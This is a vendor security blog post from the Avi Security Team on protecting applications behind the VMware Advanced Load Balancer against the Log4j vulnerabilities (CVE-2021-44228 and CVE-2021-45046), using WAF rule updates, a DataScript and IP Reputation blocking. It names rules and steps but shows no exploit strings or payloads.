Updated December 16, 2021:
- Log4j rules have been updated for precision.
- Manual rules updated.
- CRS-2021-4 released.
- Rules checked for protection against CVE-2021-45046.
- DataScript option has been added.
The Avi Security Team is actively investigating the impact of the Apache Software Foundation log4j remote code execution vulnerability (CVE-2021-44228). Avi is not impacted by this vulnerability. This blog post shows how customers can use Avi to help protect applications against this vulnerability. More details are available in this knowledge base article – https://kb.vmware.com/s/article/87100. In addition, VMware has published a Security Advisory, VMSA-2021-0028, listing all products that are affected along with available workarounds and fixes. The advisory will be updated regularly as new fixes are added.
Since the public release of the vulnerability on December 9th, 2021 and immediate exploit availability, we have been analyzing the attack vectors and provided guidance and updates through the VMware support channels and have pushed updates via the Avi Pulse Threat Intel updates.
Below you can find our recommendations on how to mitigate CVE-2021-44228 and CVE-2021-45046.with your VMware Advanced Load Balancer (Avi).
Since this is an ongoing investigation, we continue to monitor and will update our recommendations accordingly.
As the Avi Platform provides multiple layers of Application Protection, different features can be used and enabled.
All of the proposed features are available to customers subscribed to Avi Pulse Cloud Services without extra charge.
As minimum protection, we recommend the usage of Avi WAF.
Here are the individual steps.
We recommend one of the following:
- Update to the latest Avi CRS (2021-4) and make sure to enable the new rules 4022060 and 4022061 in Enforcement mode.
(New rules are initially added in Detection mode to avoid false positives, but here we highly recommend moving these rules to Enforcement mode directly.)
Screenshot: New rules in Enforcement mode.
Screenshot: Example attack blocked after CRS 2021-4 update
2. Since updating Avi CRS is not yet an option, adding the following two PRE CRS (KB) rules will provide the same protection. Again make sure these rules are in Enforcement mode.
3. Customers that have Application Rules enabled can choose the “apache” Application, which will block the attacks related to this CVE as well. Our recommendation is to still update to the latest CRS as soon as possible.
Protection via DataScript
As another method to protect against CVE-2021-44228 we developed a DataScript that blocks the attack vectors.
The DataScript is available in the Avi DataScript Github repository.
It needs to be installed as follows:
During our investigation, we have noticed that many of the IPs that are constantly scanning the internet for vulnerable machines are actually covered by our IP Reputation service. We highly recommend using the included Avi IP Reputation protection to block these known threat actors from accessing your Applications.
Note: As reported, many scans are routed through the TOR network and by blocking these IPs general availability through TOR to your applications is impacted.
Example of an IP currently blocked through IP Reputation.
LINK KB: How to enable IP Reputation.
If any new attack vectors emerge or variations of the attack are found, we will update this page, KB and Avi Pulse threat intelligence feeds accordingly.
Avi Security Team